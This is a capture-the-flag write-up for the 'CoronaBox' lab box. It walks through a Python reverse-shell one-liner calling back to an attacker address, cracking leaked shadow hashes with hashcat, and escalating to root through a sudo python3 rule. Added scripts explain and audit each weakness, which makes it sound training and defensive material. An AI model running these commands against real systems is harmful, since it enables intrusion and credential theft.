CTF ESAIP 2021 — Box Write-up: CoronaBox

CTF ESAIP 2021

CoronaBox

HackTheBox-style challenge. The goal is to retrieve the flag located in /root/.

The box is reachable at http://192.168.99.100:8088/.

The flag has the format CTF{…..}.

The Corovid web application
Example of a request sent to refresh the displayed number
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.255.6",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Using CyberChef for the encoding
Using the browser's JavaScript console to modify the command that is about to be signed
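The weak point exploited above is that the client chooses the command and the server merely signs and then executes it. The following added example (not code from the challenge or its authors; the endpoint names, the HMAC-SHA256 scheme and the "refresh_counter" action are assumptions) puts that pattern next to a hardened one in which the server only signs and executes action identifiers it already knows:

```python
# Added illustration (not code from the CoronaBox challenge): why letting the client
# choose the command that gets signed defeats the purpose of the signature.
# Endpoint names, the HMAC scheme and the "refresh_counter" action are assumptions.
import hashlib
import hmac
from typing import Optional

SERVER_SECRET = b"constructed-demo-secret"  # stays on the server; never sent to the browser


def sign(message: bytes) -> str:
    """HMAC-SHA256 over the message; proves the server saw this exact message."""
    return hmac.new(SERVER_SECRET, message, hashlib.sha256).hexdigest()


def verify(message: bytes, signature: str) -> bool:
    return hmac.compare_digest(sign(message), signature)


# --- Vulnerable pattern -----------------------------------------------------
# The page sends the command it wants as free text, the server signs it and hands the
# signature back, and the execute endpoint runs anything carrying a valid signature.
# Whoever can edit the request (for example from the browser console) can get any string
# signed, so the signature only proves "the client asked for this", not "this is allowed".
def vulnerable_sign(command: str) -> str:
    return sign(command.encode())


def vulnerable_execute(command: str, signature: str) -> str:
    if not verify(command.encode(), signature):
        return "rejected: bad signature"
    return f"executed: {command}"  # on the box this reached a shell; here we only report


# --- Hardened pattern -------------------------------------------------------
# The server owns the mapping from action id to behaviour. Clients name an action and
# never supply a command string, so there is nothing to tamper with. The signature binds
# an action id the server approved, and unknown ids are refused before anything runs.
ALLOWED_ACTIONS = {
    "refresh_counter": lambda: "counter refreshed",
}


def hardened_issue_token(action_id: str) -> Optional[str]:
    if action_id not in ALLOWED_ACTIONS:
        return None  # refuse to sign anything that is not a known action
    return sign(action_id.encode())


def hardened_execute(action_id: str, signature: str) -> str:
    action = ALLOWED_ACTIONS.get(action_id)
    if action is None:
        return "rejected: unknown action"
    if not verify(action_id.encode(), signature):
        return "rejected: bad signature"
    return action()


if __name__ == "__main__":
    tampered = "whoami"  # stand-in for whatever a tampering client would submit
    print(vulnerable_execute(tampered, vulnerable_sign(tampered)))
    print(hardened_issue_token(tampered))
    token = hardened_issue_token("refresh_counter") or ""
    print(hardened_execute("refresh_counter", token))
```

The signature check itself is identical in both halves; what changes is what gets signed. A valid MAC over attacker-chosen input is not an authorization decision, so the allowlist has to live on the server.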
Connection from 192.168.99.100:59360 
/bin/sh: 0: can't access tty; job control turned off
$ whoami
pfizer
python3 -c 'import pty; pty.spawn("/bin/sh")'
root:x:0:0:root:/root:/bin/bash
pfizer:x:1000:1000::/home/pfizer:/bin/sh
astrazeneca:x:1001:1001::/home/astrazeneca:/bin/sh
$ ls -al /srv 
ls -al /srv
total 12
drwxr-xr-x 1 root root 4096 May 29 17:29 .
drwxr-xr-x 1 root root 4096 May 23 21:48 ..
-rw-r--r-- 1 root pfizer 577 May 29 17:29 .bckp_2021-05-23_21:01.zip
$ cp /srv/.bckp_2021-05-23_21:01.zip /tmp
cp /srv/.bckp_2021-05-23_21:01.zip /tmp
$ unzip .bckp_2021-05-23_21:01.zip
unzip .bckp_2021-05-23_21:01.zip
Archive: .bckp_2021-05-23_21:01.zip
inflating: etc/shadow
$ ls -al
ls -al
total 24
drwxrwxrwt 1 root root 4096 May 29 17:30 .
drwxr-xr-x 1 root root 4096 May 23 21:48 ..
-rw-r--r-- 1 pfizer pfizer 577 May 29 17:29 .bckp_2021-05-23_21:01.zip
-rw-r--r-- 1 root root 12 May 29 17:30 .corovid_value.txt
drwxrwxr-x 2 pfizer pfizer 4096 May 29 17:30 etc
$ ls -al etc
ls -al etc
total 16
drwxrwxr-x 2 pfizer pfizer 4096 May 29 17:30 .
drwxrwxrwt 1 root root 4096 May 29 17:31 ..
-rw-r----- 1 pfizer pfizer 877 May 23 21:01 shadow
$ cat etc/shadow
cat etc/shadow
root:$6$qKTqZ3FAFP0HINUH$iIQtzV/KeP5vC12qQamP4hJ0EIm9jFIT4fJy8pjtOitMaJHWb8vNoFJLbyI8ObKvRUwVx/qSYqr47wKV6tsct0:18770:0:99999:7:::
daemon:*:18733:0:99999:7:::
bin:*:18733:0:99999:7:::
sys:*:18733:0:99999:7:::
sync:*:18733:0:99999:7:::
games:*:18733:0:99999:7:::
man:*:18733:0:99999:7:::
lp:*:18733:0:99999:7:::
mail:*:18733:0:99999:7:::
news:*:18733:0:99999:7:::
uucp:*:18733:0:99999:7:::
proxy:*:18733:0:99999:7:::
www-data:*:18733:0:99999:7:::
backup:*:18733:0:99999:7:::
list:*:18733:0:99999:7:::
irc:*:18733:0:99999:7:::
gnats:*:18733:0:99999:7:::
nobody:*:18733:0:99999:7:::
_apt:*:18733:0:99999:7:::
pfizer:$6$VjeJbF1j0r5HZyuD$4W7rRIHjbMJmMnvpUeHp4nsJl1XzmNRTZH9iNssJOlHw617sytbqajqyj8f0IpItYebpIHWa0MoAOBdBfErpZ/:18770:0:99999:7:::
astrazeneca:$6$4zZ92IsZJlH8WBNH$m2rFyDaihM7U.M4Lb1abZwt1i4dXRsM2IWE4TxPu4y1qRKxHunntwXgYrP4hlllhd7.yjK1LD58sWXEJpasNK.:18770:0:99999:7:::
pfizer:$6$VjeJbF1j0r5HZyuD$4W7rRIHjbMJmMnvpUeHp4nsJl1XzmNRTZH9iNssJOlHw617sytbqajqyj8f0IpItYebpIHWa0MoAOBdBfErpZ/
astrazeneca:$6$4zZ92IsZJlH8WBNH$m2rFyDaihM7U.M4Lb1abZwt1i4dXRsM2IWE4TxPu4y1qRKxHunntwXgYrP4hlllhd7.yjK1LD58sWXEJpasNK.
root:$6$qKTqZ3FAFP0HINUH$iIQtzV/KeP5vC12qQamP4hJ0EIm9jFIT4fJy8pjtOitMaJHWb8vNoFJLbyI8ObKvRUwVx/qSYqr47wKV6tsct0
hashcat -m 1800 -a 0 ./hashes ./rockyou.txt -O
$6$4zZ92IsZJlH8WBNH$m2rFyDaihM7U.M4Lb1abZwt1i4dXRsM2IWE4TxPu4y1qRKxHunntwXgYrP4hlllhd7.yjK1LD58sWXEJpasNK.:monsauveur
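The whole chain above hinges on a world-readable backup in /srv that carried a copy of /etc/shadow. The added script below (not part of the original write-up) is the kind of check an administrator can run over backup directories: it walks a tree, opens every zip it finds, and reports archives readable by other users as well as members that look like credential material. The directory layout, filenames and shadow contents it builds are constructed fixtures, and the list of sensitive member names is an assumption to extend as needed.

```python
# Added example (not part of the original write-up): audit a directory for backup
# archives that are readable by other users and that contain credential material such
# as etc/shadow. Directory layout, filenames and shadow content below are constructed.
import os
import stat
import tempfile
import zipfile
from pathlib import Path

# Archive members whose presence in a backup deserves a look (assumed list, extend as needed)
SENSITIVE_SUFFIXES = ("etc/shadow", "etc/gshadow", "id_rsa", "id_ed25519", ".env")


def scan_archive(path: Path) -> list:
    """Return (filename, finding) tuples for one zip archive."""
    findings = []
    mode = path.stat().st_mode
    if mode & stat.S_IROTH:
        findings.append((path.name, "world_readable:" + stat.filemode(mode)))
    try:
        with zipfile.ZipFile(path) as zf:
            for member in zf.namelist():
                name = member.rstrip("/")
                if any(name.endswith(suffix) for suffix in SENSITIVE_SUFFIXES):
                    findings.append((path.name, "sensitive_member:" + member))
    except zipfile.BadZipFile:
        findings.append((path.name, "unreadable_zip"))
    return findings


def scan_directory(root: Path) -> list:
    """Walk root (hidden files included, as os.walk does) and scan every zip found."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            candidate = Path(dirpath) / filename
            if zipfile.is_zipfile(candidate):
                findings.extend(scan_archive(candidate))
    return findings


def build_demo_directory() -> Path:
    """Constructed fixture mirroring the /srv layout seen on the box (dummy contents)."""
    root = Path(tempfile.mkdtemp(prefix="srv_audit_demo_"))
    leaky = root / ".bckp_demo.zip"  # hidden name, like the real backup
    with zipfile.ZipFile(leaky, "w") as zf:
        zf.writestr("etc/shadow", "root:$6$CONSTRUCTED$notarealhash:18770:0:99999:7:::\n")
        zf.writestr("etc/hostname", "demo\n")
    leaky.chmod(0o644)  # -rw-r--r--, the mode the box's backup had
    clean = root / "www-backup.zip"
    with zipfile.ZipFile(clean, "w") as zf:
        zf.writestr("var/www/index.html", "<html></html>\n")
    clean.chmod(0o640)  # group-readable only
    return root


if __name__ == "__main__":
    for filename, finding in scan_directory(build_demo_directory()):
        print(f"{filename}: {finding}")
```

Two findings would have flagged the box's backup: the archive mode (-rw-r--r--) and the etc/shadow member. Either one alone is worth fixing; together they hand every local account the hashes to crack offline.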
$ su astrazeneca
su astrazeneca
Password: monsauveur
$ sudo -l
sudo -l
Matching Defaults entries for astrazeneca on 1a37df71d186:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User astrazeneca may run the following commands on 1a37df71d186:
(ALL : ALL) NOPASSWD: /usr/bin/python3
$ sudo python3 -c 'import os; os.system("/bin/sh")'
sudo python3 -c 'import os; os.system("/bin/sh")'
# whoami
whoami
root
# cat /root/flag.txt
cat /root/flag.txt
CTF{V@cc!nezVous@h@h}
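The final step relied on a sudoers rule granting astrazeneca passwordless root execution of /usr/bin/python3, an interpreter that can trivially hand back a shell. The added script below (not from the write-up) parses `sudo -l` output and flags rules whose command list contains ALL or a program able to spawn a shell or run arbitrary code. The sample input reproduces the rule shown on the box; the set of shell-capable programs is an assumption drawn from common interpreters, editors and pagers, not an exhaustive catalogue.

```python
# Added example (not from the write-up): parse `sudo -l` output and flag rules that let a
# user reach root through a program able to spawn a shell or run arbitrary code. The sample
# input reproduces the rule shown on the box; the list of shell-capable programs is an
# assumption drawn from common interpreters/editors, not an exhaustive catalogue.
import os
import re

SHELL_CAPABLE = {
    "sh", "bash", "dash", "zsh", "env", "python", "python2", "python3", "perl",
    "ruby", "node", "php", "vi", "vim", "nano", "less", "more", "awk", "find",
}

# "(runas) TAG: TAG: /path/cmd args, /path/other"  -> runas / tags / command list
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_l(output: str) -> list:
    """Return one dict per rule listed after the 'may run the following commands' header."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue  # skip the 'Matching Defaults entries' section
        match = RULE_RE.match(line)
        if not match:
            continue
        tags = [t.strip() for t in match.group("tags").split(":") if t.strip()]
        commands = [c.strip() for c in match.group("cmds").split(",")]
        rules.append({"runas": match.group("runas").strip(), "tags": tags, "commands": commands})
    return rules


def assess_rule(rule: dict) -> list:
    """Explain why a rule is risky; an empty list means nothing stood out."""
    issues = []
    for command in rule["commands"]:
        if command == "ALL":
            issues.append("ALL: unrestricted command list")
            continue
        program = os.path.basename(command.split()[0])
        if program in SHELL_CAPABLE:
            issues.append(f"{command}: can spawn a shell or run arbitrary code")
    if issues and "NOPASSWD" in rule["tags"]:
        issues.append("NOPASSWD: no password prompt, so a stolen session is enough")
    return issues


# Constructed sample: the exact rule reported by `sudo -l` on the box.
SAMPLE_SUDO_L = """\
Matching Defaults entries for astrazeneca on 1a37df71d186:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User astrazeneca may run the following commands on 1a37df71d186:
    (ALL : ALL) NOPASSWD: /usr/bin/python3
"""


def audit(output: str) -> list:
    """Pair every parsed rule with its issues; the caller decides what to fix."""
    return [(rule, assess_rule(rule)) for rule in parse_sudo_l(output)]


if __name__ == "__main__":
    for rule, issues in audit(SAMPLE_SUDO_L):
        print(f"({rule['runas']}) {' '.join(rule['tags'])} {', '.join(rule['commands'])}")
        for issue in issues:
            print("  -", issue)
```

The fix on the sudoers side is the usual one: grant a specific script with fixed arguments instead of an interpreter, and drop NOPASSWD unless an unattended job genuinely needs it.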


French CTF team
